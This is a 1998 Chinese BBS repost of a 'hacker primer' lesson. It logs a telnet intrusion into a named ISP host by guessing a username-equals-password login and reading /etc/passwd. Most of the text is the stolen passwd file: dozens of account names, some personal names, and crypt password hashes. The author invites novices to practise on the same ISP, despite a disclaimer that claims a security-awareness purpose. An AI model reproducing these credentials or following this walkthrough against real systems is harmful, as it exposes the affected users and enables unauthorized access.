荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: white (白云飞), 信区: Hacker
标 题: (转摘)小心黑客(6)
发信站: 深大荔园晨风站 (Tue Jan 6 20:40:44 1998), 转信
Subject: 黑客入门(3)-纸老虎转贴
CoolHC Volume 2 By CoolFire Author E-Mail: coolfires@hotmail.com
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全
的
保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电
脑,
我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人
Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!
前几次说到了 Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或
是
帐号被人盗用的客户不就糗大了! 但是 CoolFire 在这两周的探险中, 为了找一个酷
似
网路咖啡站台的 W3 密码, 误入一个号称第一个提供网路拨接的 ISP, 且在
CoolFire
顺利的抓回 /etc/passwd 之後, 使用了自己写的 PaSs2DiC + CJack 来解出密码,
没
想到不用 1 分钟, 就找出了 9 组 ID 与 Password 相同的密码, 勿怪我没有在这里
提
醒大家, 还好我没有找到 root password, 不然可能该系统就此停摆, 不可再见天日
也!
(当然我不可能这么作啦!).
看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上 CoolFire 最近开会的
时
候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安
全
性若不加强, 可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金
融
及工商业 溃! 大家要小心呀 !ISP 是一般 User 拨接的源头, 技术上理应比较强,
但
还是轻易让人入侵, 且又没有教导 User 正确的网路使用观念 (Password 的设定及
proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子 ??
这一次的说明还是没有谈到新的技巧, 在 James 将首页更新後各位应该已经可以从
中学
到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯 (入侵本国的网路则不
用,
反正没人重视网路安全..... 真失望), 在别人还没将 Bug 修正之前就抢先一步拿到
/etc/passwd, 所以订阅一些网路安全的 Mail List 是必要的, 多看一些网安有关的
News Group 也是必要的 (不仅 Hacker 如此, ISP 更要多注意这些资讯!). 日後有
空再
整里一些 Mail List 给大家 !!
本次主题: 说明如何连接该 ISP 并且对其 /etc/passwd 解码
连接位址: www.coffee.com.tw (203.66.169.11)
特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以 CoolFire 已经
Mail
给该网页之维护人员更改密码, 但该网页之 ISP 仍为新手之练习好题材!
CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉,
我也没办法了!
Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 请速更动网页密码
From: CoolFire
你的网页作得不错, 但是因为你所设定的密码太容易为骇客所入侵,
请於见到此信後速速更改你的网页进入密码, 否则下次
若网页遭到篡改, 本人概不负责!!
**** 课程开始 ****
请注意: 由於本次所作的课程内容以实作为主, 除了本人 IP 有所更改, 一切都使用
本
人所用之Telnet 软体 Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内
容,
否则本人概不负责!
(连线到某一主机之後.... 此处的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
Password: (随便按一下 Enter)
Login incorrect
www login: coffee (以 Hacker 的敏锐判断 username=coffee
password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw
欢 迎 光 临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧!
=================================================================
(直接进入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/
(看看我们的目标长得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect
Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia
Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime
service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime
liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdle
--
※ 来源:.深大荔园晨风站 bbs.szu.edu.cn.[FROM: 202.192.140.204]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店